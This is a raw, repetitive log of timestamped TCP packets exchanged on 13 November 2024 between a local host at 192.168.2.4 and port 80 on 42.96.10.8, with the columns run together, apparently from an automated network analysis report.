                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228876114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228876114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228926897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229053974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229084969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229125023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229171991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229182959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229243994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229263067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229290962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229305983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229311943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229315996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229351997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229367018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229379892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229379892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229381084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229399920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229403019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229420900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229480982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229504108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229520082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229536057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229536057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229552984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229569912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229585886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229610920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229610920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229630947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229648113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229788065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.229788065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270176888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270200968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270220995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270406961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270426989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270440102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270446062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270531893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270549059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270574093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270589113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270603895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270603895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270603895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270608902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.270658970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.313471079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.313498020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.313515902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.313543081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.313694000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.323141098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.323194027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.323210001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.323237896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324172020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324187994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324207067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324223995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324230909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324254036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324269056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324297905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.324297905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342293024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342317104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342334986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342346907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342464924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342506886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342525959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342534065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342560053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342566967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342580080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342597008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342608929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342653036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342673063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342683077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342690945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342710972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342725039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342736959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342755079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342768908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342784882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342802048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342818022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342845917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342845917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342899084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342926025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342941046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342959881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342988014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.342988968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343040943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343056917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343133926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343149900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343166113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343168974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343184948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343202114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343209028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343209028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343282938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343290091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343307972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343336105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343353033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343368053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343384027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343394041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343394995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343400955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343410969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343427896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343435049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343435049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343487024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343503952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343508005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343522072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343537092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343597889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343614101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343628883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343647003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343647957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343655109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343702078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343715906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343730927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343746901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343760014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343760014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343760014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343775988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343801022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343808889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343826056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343842030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343858004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343869925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343869925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343924046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343940020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343955994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343969107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.343971968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344011068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344022036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344038010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344049931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344053030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344069958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344085932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344115019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344115019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344120026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344136953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344185114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344201088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344216108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344229937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344229937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344269037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344310045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344326973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344341993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344351053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344367981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344388962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344409943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344427109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344444036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344455957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344461918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344470024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344479084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344521999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344542027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344558001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344574928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344589949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344607115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344624996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344640970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344664097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344685078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344701052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344726086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344741106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344754934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344769001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344786882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344795942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344805002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344821930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344844103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344929934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344947100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344963074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344971895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.344980001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345005989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345046043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345062017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345076084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345093012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345098019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345098019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345110893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.345381021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.385931969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.385956049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.385974884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.385992050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386022091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386037111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386049986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386049986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386054993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386073112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386097908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386097908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386104107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386120081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386142969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386157036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386174917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.386256933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.429183960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.429208040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.429225922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.429256916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.431344032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.438776016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.438807011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.438822031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439656973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439671040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439687014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439706087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439716101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439721107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439739943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439752102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439754963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439790964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.439836979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458087921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458112955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458142996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458158970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458177090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458193064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458206892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458206892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458209991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458228111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458246946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458281040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458281040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458314896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458331108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458350897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458359957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458769083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458791971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458810091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458821058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458826065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458846092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458862066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458874941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458874941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458879948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458895922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458920956 CET4973380192.168.2.442.96.10.8
